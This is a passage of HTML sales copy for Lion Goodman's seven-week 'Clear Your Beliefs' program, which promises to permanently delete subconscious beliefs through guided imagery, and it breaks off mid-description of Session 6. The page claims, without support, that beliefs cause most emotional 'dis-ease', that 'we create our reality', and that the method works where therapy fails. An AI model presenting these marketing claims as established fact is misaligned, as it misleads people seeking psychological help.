you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a 